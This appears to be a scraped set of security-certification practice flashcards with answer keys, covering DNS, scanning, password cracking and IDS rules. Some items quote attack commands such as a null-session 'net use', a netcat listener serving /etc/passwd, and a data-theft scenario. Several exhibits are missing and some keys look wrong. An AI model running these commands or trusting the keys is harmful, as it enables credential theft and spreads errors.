A company’s policy requires employees to perform file transfers using protocols which encrypt traffic. You suspect some employees are still performing file transfers using unencrypted protocols because the employees do not like changes. You have positioned a network sniffer to capture traffic from the laptops used by employees in the data ingest department. Using Wireshark to examine the captured traffic, which command can be used as display filter to find unencrypted file transfers?

tcp.port = = 21
tcp.port = 23
tcp.port = = 21 | | tcp.port = =22
tcp.port ! = 21

A

tcp.port = = 21

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
92
Q

You just set up a security system in your network. In what kind of system would you find the following string of characters used as a rule within its configuration? alert tcp any any -> 192.168.100.0/24 21 (msg: ““FTP on the network!””;)

A firewall IPTable
FTP Server rule
A Router IPTable
An Intrusion Detection System

A

An Intrusion Detection System

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
93
Q

Which of the following program infects the system boot sector and the executable files at the same time?

Polymorphic virus
Stealth virus
Multipartite Virus
Macro virus

A

Multipartite Virus

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
94
Q

To determine if a software program properly handles a wide range of invalid input, a form of automated testing can be used to randomly generate invalid input in an attempt to crash the program.

What term is commonly used when referring to this type of testing?

Randomizing
Bounding
Mutating
Fuzzing

A

Fuzzing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
95
Q

An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of packets sent to a Web server in the network’s external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file. What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive?

Protocol analyzer
Network sniffer
Intrusion Prevention System (IPS)
Vulnerability scanner

A

Protocol analyzer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
96
Q

The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE’s Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520.
What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy?

Public
Private
Shared
Root

A

Private

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
97
Q

Why should the security analyst disable/remove unnecessary ISAPI filters?

To defend against social engineering attacks
To defend against webserver attacks
To defend against jailbreaking
To defend against wireless attacks

A

To defend against webserver attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
98
Q

Which of the following is a component of a risk assessment?

Administrative safeguards
Physical security
DMZ
Logical interface

A

Administrative safeguards

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
99
Q

CompanyXYZ has asked you to assess the security of their perimeter email gateway. From your office in New York, you craft a specially formatted email message and send it across the Internet to an employee of CompanyXYZ. The employee of CompanyXYZ is aware of your test. Your email message looks like this:

From: jim_miller@companyxyz.com
To: michelle_saunders@companyxyz.com Subject: Test message
Date: 4/3/2017 14:37
The employee of CompanyXYZ receives your email message.

This proves that CompanyXYZ’s email gateway doesn’t prevent what?

Email Masquerading
Email Harvesting
Email Phishing
Email Spoofing

A

Email Spoofing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
100
Q

Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is not needed if he properly configures the firewall to allow access just to servers/ports, which can have direct internet access, and block the access to workstations.
Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA.
In this context, what can you say?

Bob can be right since DMZ does not make sense when combined with stateless firewalls
Bob is partially right. He does not need to separate networks if he can create rules by destination IPs, one by one
Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations
Bob is partially right. DMZ does not make sense when a stateless firewall is available

A

Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
101
Q

Bob is acknowledged as a hacker of repute and is popular among visitors of “underground” sites.
Bob is willing to share his knowledge with those who are willing to learn, and many have expressed their interest in learning from him. However, this knowledge has a risk associated with it, as it can be used for malevolent attacks as well.

In this context, what would be the most effective method to bridge the knowledge gap between the “black” hats or crackers and the “white” hats or computer security professionals? (Choose the test answer.)

Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards.
Hire more computer security monitoring personnel to monitor computer systems and networks.
Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they are a part of something larger than life.
Train more National Guard and reservist in the art of computer security to help out in times of emergency or crises.

A

Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
102
Q

Peter extracts the SIDs list from Windows 2000 Server machine using the hacking tool “SIDExtractor”. Here is the output of the SIDs:

From the above list identify the user account with System Administrator privileges.

John
Rebecca
Sheela
Shawn
Somia
Chang
Micah

A

Chang

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
103
Q

Which address translation scheme would allow a single public IP address to always correspond to a single machine on an internal network, allowing “server publishing”?

Overloading Port Address Translation
Dynamic Port Address Translation
Dynamic Network Address Translation
Static Network Address Translation

A

Static Network Address Translation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
104
Q

What is the following command used for?
net use \targetipc$ “” /u:””

Grabbing the etc/passwd file
Grabbing the SAM
Connecting to a Linux computer through Samba.
This command is used to connect as a null session
Enumeration of Cisco routers

A

This command is used to connect as a null session

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
105
Q

What is the proper response for a NULL scan if the port is closed?

SYN
ACK C. FIN
PSH
RST
No response

A

RST

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
106
Q

One of your team members has asked you to analyze the following SOA record.
What is the TTL? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.)

200303028
3600
604800
2400
60
4800

A

2400

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
107
Q

One of your team members has asked you to analyze the following SOA record. What is the version? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.) (Choose four.)

200303028
3600
604800
2400
60
4800

A

200303028

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
108
Q

MX record priority increases as the number increases. (True/False.)

True
False

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
109
Q

Which of the following tools can be used to perform a zone transfer?

NSLookup
Finger
Dig
Sam Spade
Host
Netcat
Neotrace

A

NSLookup, Dig, Sam Spade, Host

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
110
Q

Under what conditions does a secondary name server request a zone transfer from a primary name server?

When a primary SOA is higher that a secondary SOA
When a secondary SOA is higher that a primary SOA
When a primary name server has had its service restarted
When a secondary name server has had its service restarted E. When the TTL falls to zero

A

When a primary SOA is higher that a secondary SOA

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
111
Q

What ports should be blocked on the firewall to prevent NetBIOS traffic from not coming through the firewall if your network is comprised of Windows NT, 2000, and XP?

110
135
139
161
445
1024

A

135, 139, 445

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
112
Q

What is a NULL scan?

A scan in which all flags are turned off
A scan in which certain flags are off
A scan in which all flags are on
A scan in which the packet size is set to zero
A scan with an illegal packet size

A

A scan in which all flags are turned off

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
113
Q

What is the proper response for a NULL scan if the port is open?

SYN
ACK C. FIN
PSH
RST
No response

A

No response

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
114
Q

Which of the following statements about a zone transfer is correct? (Choose three.)

A zone transfer is accomplished with DNS

A zone transfer is accomplished with the nslookup service

A zone transfer passes all zone information that a DNS server maintains

A zone transfer passes all zone information that a nslookup server maintains

A zone transfer can be prevented by blocking all inbound TCP port 53 connections

Zone transfers cannot occur on the Internet

A

A zone transfer is accomplished with DNS

A zone transfer passes all zone information that a DNS server maintains

A zone transfer can be prevented by blocking all inbound TCP port 53 connections

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
115
Q

You have the SOA presented below in your Zone.
Your secondary servers have not been able to contact your primary server to synchronize information. How long will the secondary servers attempt to contact the primary server before it considers that zone is dead and stops responding to queries?
collegae.edu.SOA, cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600)

One day
One hour
One week
One month

A

One week

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
116
Q

Tess King is using the nslookup command to craft queries to list all DNS information (such as Name Servers, host names, MX records, CNAME records, glue records (delegation for child Domains), zone serial number, TimeToLive (TTL) records, etc) for a Domain.

What do you think Tess King is trying to accomplish? Select the best answer.

A zone harvesting
A zone transfer
A zone update
A zone estimate

A

A zone transfer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
117
Q

A zone file consists of which of the following Resource Records (RRs)?

DNS, NS, AXFR, and MX records
DNS, NS, PTR, and MX records
SOA, NS, AXFR, and MX records
SOA, NS, A, and MX records

A

SOA, NS, A, and MX records

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
118
Q

Let’s imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. How do you prevent DNS spoofing?

Install DNS logger and track vulnerable packets
Disable DNS timeouts
Install DNS Anti-spoofing
Disable DNS Zone Transfer

A

Install DNS Anti-spoofing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
119
Q

Which DNS resource record can indicate how long any “DNS poisoning” could last?

MX
SOA
NS
TIMEOUT

A

SOA

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
120
Q

Joseph was the Web site administrator for the Mason Insurance in New York, who’s main Web site was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the Web site. One night, Joseph received an urgent phone call from his friend, Smith. According to Smith, the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker’s message ‘‘Hacker Message: You are dead! Freaks!” From his office, which was directly connected to Mason Insurance’s internal network, Joseph surfed to the Web site using his laptop. In his browser, the Web site looked completely intact.

No changes were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web site appeared defaced when his friend visited using his DSL connection. So, while Smith and his friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make sense of this problem, Joseph decided to access the Web site using hisdial-up ISP. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser to reveal the following web page:

After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and determined that every system file and all the Web content on the server were intact. How did the attacker accomplish this hack?

ARP spoofing
SQL injection
DNS poisoning
Routing table injection

A

DNS poisoning

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
121
Q

Which of the following tools are used for enumeration? (Choose three.)

SolarWinds
USER2SID
Cheops
SID2USER
DumpSec

A

USER2SID, SID2USER , DumpSec

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
122
Q

What did the following commands determine?

That the Joe account has a SID of 500

These commands demonstrate that the guest account has NOT been disabled

These commands demonstrate that the guest account has been disabled

That the true administrator is Joe

Issued alone, these commands prove nothing

A

That the true administrator is Joe

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
123
Q

Which definition among those given below best describes a covert channel?

A server program using a port that is not well known.
Making use of a protocol in a way it is not intended to be used.
It is the multiplexing taking place on a communication link.
It is one of the weak channels used by WEP which makes it insecure

A

Making use of a protocol in a way it is not intended to be used.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
124
Q

Susan has attached to her company’s network. She has managed to synchronize her boss’s sessions with that of the file server. She then intercepted his traffic destined for the server, changed it the way she wanted to and then placed it on the server in his home directory.

What kind of attack is Susan carrying on?

A sniffing attack
A spoofing attack
A man in the middle attack
A denial of service attack

A

A man in the middle attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
125
Q

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learnt to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between the two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric is relaying the information between the two. What would you call this attack?

Interceptor
Man-in-the-middle
ARP Proxy
Poisoning Attack

A

Man-in-the-middle

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
126
Q

Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate Alice machine. From the command prompt, she types the following command.

What is Eve trying to do?

Eve is trying to connect as a user with Administrator privileges
Eve is trying to enumerate all users with Administrative privileges
Eve is trying to carry out a password crack for user Administrator
Eve is trying to escalate privilege of the null user to that of Administrator

A

Eve is trying to carry out a password crack for user Administrator

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
127
Q

Which of the following represents the initial two commands that an IRC client sends to join an IRC network?

USER, NICK
LOGIN, NICK
USER, PASS
LOGIN, USER

A

USER, NICK

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
128
Q

Study the following log extract and identify the attack.

Hexcode Attack
Cross Site Scripting
Multiple Domain Traversal Attack
Unicode Directory Traversal Attack

A

Unicode Directory Traversal Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
129
Q

Null sessions are un-authenticated connections (not using a username or password.) to an NT or 2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?

137 and 139
137 and 443
139 and 443
139 and 445

A

139 and 445

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
130
Q

The following is an entry captured by a network IDS. You are assigned the task of analyzing this entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the attacker is attempting a buffer overflow attack.
You also notice “/bin/sh” in the ASCII part of the output.
As an analyst what would you conclude about the attack?

The buffer overflow attack has been neutralized by the IDS
The attacker is creating a directory on the compromised machine
The attacker is attempting a buffer overflow attack and has succeeded
The attacker is attempting an exploit that launches a command-line shell

A

The attacker is attempting an exploit that launches a command-line shell

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
131
Q

Based on the following extract from the log of a compromised machine, what is the hacker really trying to steal?

har.txt
SAM file
wwwroot
Repair file

A

SAM file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
132
Q

As a securing consultant, what are some of the things you would recommend to a company to ensure DNS security?
Choose four.

Use the same machines for DNS and other applications
Harden DNS servers
Use split-horizon operation for DNS servers
Restrict Zone transfers
Have subnet diversity between DNS servers

A

Harden DNS servers
Use split-horizon operation for DNS servers
Restrict Zone transfers
Have subnet diversity between DNS servers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
133
Q

Why would you consider sending an email to an address that you know does not exist within the company you are performing a Penetration Test for?

To determine who is the holder of the root account
To perform a DoS
To create needless SPAM
To illicit a response back that will reveal information about email servers and how they treat undeliverable mail
To test for virus protection

A

To illicit a response back that will reveal information about email servers and how they treat undeliverable mail

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
134
Q

What tool can crack Windows SMB passwords simply by listening to network traffic?

This is not possible
Netbus
NTFSDOS
L0phtcrack

A

L0phtcrack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
135
Q

A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network. What are some things he can do to prevent it? Select the best answers.

Use port security on his switches.
Use a tool like ARPwatch to monitor for strange ARP activity.
Use a firewall between all LAN segments.
If you have a small network, use static ARP entries.
Use only static IP addresses on all PC’s.

A

Use port security on his switches.
Use a tool like ARPwatch to monitor for strange ARP activity.
If you have a small network, use static ARP entries.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
136
Q

Peter, a Network Administrator, has come to you looking for advice on a tool that would help him perform SNMP enquires over the network.
Which of these tools would do the SNMP enumeration he is looking for? Select the best answers.

SNMPUtil
SNScan
SNMPScan
Solarwinds IP Network Browser
NMap

A

SNMPUtil
SNScan
Solarwinds IP Network Browser

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
137
Q

If a token and 4-digit personal identification number (PIN) are used to access a computer system and the token performs off-line checking for the correct PIN, what type of attack is possible?

Birthday
Brute force
Man-in-the-middle
Smurf

A

Brute force

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
138
Q

Bob is doing a password assessment for one of his clients. Bob suspects that security policies are not in place. He also suspects that weak passwords are probably the norm throughout the company he is evaluating. Bob is familiar with password weaknesses and key loggers.
Which of the following options best represents the means that Bob can adopt to retrieve passwords from his clients hosts and servers?

Hardware, Software, and Sniffing.
Hardware and Software Keyloggers.
Passwords are always best obtained using Hardware key loggers.
Software only, they are the most effective.

A

Hardware, Software, and Sniffing.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
139
Q

Study the snort rule given below:

From the options below, choose the exploit against which this rule applies.

WebDav
SQL Slammer
MS Blaster
MyDoom

A

MS Blaster

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
140
Q

Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or stored?

symmetric algorithms
asymmetric algorithms
hashing algorithms
integrity algorithms

A

hashing algorithms

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
141
Q

A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges which carry user logons. The user is plugged into a hub with 23 other systems.
However, he is unable to capture any logons though he knows that other users are logging in.
What do you think is the most likely reason behind this?

There is a NIDS present on that segment.
Kerberos is preventing it.
Windows logons cannot be sniffed.
L0phtcrack only sniffs logons to web servers.

A

Kerberos is preventing it.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
142
Q

You are attempting to crack LM Manager hashed from Windows 2000 SAM file. You will be using LM Brute force hacking tool for decryption. What encryption algorithm will you be decrypting?

MD4
DES
SHA
SSL

A

DES

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
143
Q

In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its automated exploration. If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an attack?

Full Blown
Thorough
Hybrid
BruteDics

A

Hybrid

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
144
Q

What is the algorithm used by LM for Windows2000 SAM?

MD4
DES
SHA
SSL

A

DES

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
145
Q

E-mail scams and mail fraud are regulated by which of the following?

18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers
18 U.S.C. par. 1029 Fraud and Related activity in connection with Access Devices
18 U.S.C. par. 1362 Communication Lines, Stations, or Systems
18 U.S.C. par. 2510 Wire and Electronic Communications Interception and Interception of Oral Communication

A

18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
146
Q

Which of the following LM hashes represent a password of less than 8 characters? (Choose two.)

BA810DBA98995F1817306D272A9441BB
44EFCE164AB921CQAAD3B435B51404EE
0182BD0BD4444BF836077A718CCDF409
CEC52EB9C8E3455DC2265B23734E0DAC
B757BF5C0D87772FAAD3B435B51404EE
E52CAC67419A9A224A3B108F3FA6CB6D

A

44EFCE164AB921CQAAD3B435B51404EE
B757BF5C0D87772FAAD3B435B51404EE

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
147
Q

Which of the following is the primary objective of a rootkit?

It opens a port to provide an unauthorized service
It creates a buffer overflow
It replaces legitimate programs
It provides an undocumented opening in a program

A

It replaces legitimate programs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
148
Q

This kind of password cracking method uses word lists in combination with numbers and special characters:

Hybrid
Linear
Symmetric
Brute Force

A

Hybrid

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
149
Q

___ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes.

Trojan
RootKit
DoS tool
Scanner
Backdoor

A

RootKit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
150
Q

What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?

Copy the system files from a known good system
Perform a trap and trace
Delete the files and try to determine the source
Reload from a previous backup
Reload from known good media

A

Reload from known good media

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
151
Q

What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common?

All are hacking tools developed by the legion of doom
All are tools that can be used not only by hackers, but also security personnel
All are DDOS tools
All are tools that are only effective against Windows
All are tools that are only effective against Linux

A

All are DDOS tools

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
152
Q

How can you determine if an LM hash you extracted contains a password that is less than 8 characters long?

There is no way to tell because a hash cannot be reversed
The right most portion of the hash is always the same
The hash always starts with AB923D
The left most portion of the hash is always the same
A portion of the hash will be all 0’s

A

The right most portion of the hash is always the same

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
153
Q

When discussing passwords, what is considered a brute force attack?

You attempt every single possibility until you exhaust all possible combinations or discover the password

You threaten to use the rubber hose on someone unless they reveal their password

You load a dictionary of words into your cracking program

You create hashes of a large number of words and compare it with the encrypted passwords

You wait until the password expires

A

You attempt every single possibility until you exhaust all possible combinations or discover the password

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
154
Q

Which of the following are well known password-cracking programs?

L0phtcrack
NetCat
Jack the Ripper
Netbus
John the Ripper

A

L0phtcrack
John the Ripper

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
155
Q

Password cracking programs reverse the hashing process to recover passwords. (True/False.)

True
False

A

False

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
156
Q

While examining audit logs, you discover that people are able to telnet into the SMTP server on port 25. You would like to block this, though you do not see any evidence of an attack or other wrong doing. However, you are concerned about affecting the normal functionality of the email server. From the following options choose how best you can achieve this objective?

Block port 25 at the firewall.
Shut off the SMTP service on the server.
Force all connections to use a username and password.
Switch from Windows Exchange to UNIX Sendmail.
None of the above.

A

None of the above.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
157
Q

Windows LAN Manager (LM) hashes are known to be weak.
Which of the following are known weaknesses of LM? (Choose three.)

Converts passwords to uppercase.
Hashes are sent in clear text over the network.
Makes use of only 32-bit encryption.
Effective length is 7 characters.

A

Converts passwords to uppercase.
Hashes are sent in clear text over the network.
Effective length is 7 characters.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
158
Q

You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you come to know that they are enforcing strong passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following categories: lower case letters, capital letters, numbers and special characters. With your existing knowledge of users, likely user account names and the possibility that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values and still get results?

Online Attack
Dictionary Attack
Brute Force Attack
Hybrid Attack

A

Hybrid Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
159
Q

An attacker runs netcat tool to transfer a secret file between two hosts.

He is worried about information being sniffed on the network.
How would the attacker use netcat to encrypt the information before transmitting onto the wire?

Machine A: netcat -l -p -s password 1234 < testfileMachine B: netcat <machine> 1234
Machine A: netcat -l -e magickey -p 1234 < testfileMachine B: netcat <machine> 1234
Machine A: netcat -l -p 1234 < testfile -pw passwordMachine B: netcat <machine> 1234 -pw password
Use cryptcat instead of netcat</machine></machine></machine>

A

Use cryptcat instead of netcat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
160
Q

What is GINA?

Gateway Interface Network Application
GUI Installed Network Application CLASS
Global Internet National Authority (G-USA)
Graphical Identification and Authentication DLL

A

Graphical Identification and Authentication DLL

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
161
Q

Fingerprinting an Operating System helps a cracker because:

It defines exactly what software you have installed
It opens a security-delayed window based on the port being scanned
It doesn’t depend on the patches that have been applied to fix existing security holes
It informs the cracker of which vulnerabilities he may be able to exploit on your system

A

It informs the cracker of which vulnerabilities he may be able to exploit on your system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
162
Q

In the context of Windows Security, what is a ‘null’ user?

A user that has no skills
An account that has been suspended by the admin
A pseudo account that has no username and password
A pseudo account that was created for security administration purpose

A

A pseudo account that has no username and password

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
163
Q

What does the following command in netcat do?

nc -l -u -p55555 < /etc/passwd

logs the incoming connections to /etc/passwd file
loads the /etc/passwd file to the UDP port 55555
grabs the /etc/passwd file when connected to UDP port 55555
deletes the /etc/passwd file when connected to the UDP port 55555

A

grabs the /etc/passwd file when connected to UDP port 55555

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
164
Q

In this attack, a victim receives an e-mail claiming from PayPal stating that their account has been disabled and confirmation is required before activation. The attackers then scam to collect not one but two credit card numbers, ATM PIN number and other personal details. Ignorant users usually fall prey to this scam.

Which of the following statement is incorrect related to this attack?

Do not reply to email messages or popup ads asking for personal or financial information

Do not trust telephone numbers in e-mails or popup ads

Review credit card and bank account statements regularly

Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks

Do not send credit card numbers, and personal or financial information via e-mail

A

Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
165
Q

What hacking attack is challenge/response authentication used to prevent?

Replay attacks
Scanning attacks
Session hijacking attacks
Password cracking attacks

A

Replay attacks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
166
Q

Bob is going to perform an active session hijack against Brownies Inc. He has found a target that allows session oriented connections (Telnet) and performs the sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network. What is Bob supposed to do next?

Take over the session
Reverse sequence prediction
Guess the sequence numbers
Take one of the parties offline

A

Guess the sequence numbers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
167
Q

ViruXine.W32 virus hides their presence by changing the underlying executable code.
This Virus code mutates while keeping the original algorithm intact, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all.

Here is a section of the Virus code:

What is this technique called?

Polymorphic Virus
Metamorphic Virus
Dravidic Virus
Stealth Virus

A

Polymorphic Virus

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
168
Q

Identify the correct terminology that defines the above statement.

Vulnerability Scanning
Penetration Testing
Security Policy Implementation
Designing Network Security

A

Penetration Testing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
169
Q

Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches.
If these switches’ ARP cache is successfully flooded, what will be the result?

The switches will drop into hub mode if the ARP cache is successfully flooded.
If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks.
Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch.
The switches will route all traffic to the broadcast address created collisions.

A

The switches will drop into hub mode if the ARP cache is successfully flooded.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
170
Q

You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.c

What is the hexadecimal value of NOP instruction?

0x60
0x80
0x70
0x90

A

0x90

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
171
Q

This TCP flag instructs the sending system to transmit all buffered data immediately.

SYN
RST
PSH
URG
FIN

A

PSH

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
172
Q

The network administrator at Spears Technology, Inc has configured the default gateway Cisco router’s access-list as below:

You are hired to conduct security testing on their network.
You successfully brute-force the SNMP community string using a SNMP crack tool.
The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco configuration from the router. How would you proceed?

Use the Cisco’s TFTP default password to connect and download the configuration file
Run a network sniffer and capture the returned traffic with the configuration file from the router
Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address
Send a customized SNMP set request with a spoofed source IP address in the range -192.168.1.0

A

Run a network sniffer and capture the returned traffic with the configuration file from the router
Send a customized SNMP set request with a spoofed source IP address in the range -192.168.1.0

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
173
Q

You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company’s Sales database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion?

Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account

Package the Sales.xls using Trojan wrappers and telnet them back your home computer

You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques

Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account

A

You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent looking email or file transfer using Steganography techniques

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
174
Q

Study the snort rule given below and interpret the rule. alert tcp any any –> 192.168.1.0/24 111 (content:”|00 01 86 a5|”; msG. “mountd access”;)

An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111

An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet

An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet

An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

A

An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
175
Q

What port number is used by LDAP protocol?

110
389
464
445

A

389

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
176
Q

Fred is the network administrator for his company. Fred is testing an internal switch.
From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this?

Fred can accomplish this by sending an IP packet with the RST/SYN bit and the source address of his computer.

He can send an IP packet with the SYN bit and the source address of his computer.

Fred can send an IP packet with the ACK bit set to zero and the source address of the switch.

Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

A

Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
177
Q

Within the context of Computer Security, which of the following statements describes Social Engineering best?

Social Engineering is the act of publicly disclosing information
Social Engineering is the means put in place by human resource to perform time accounting
Social Engineering is the act of getting needed information from a person rather than breaking into a system
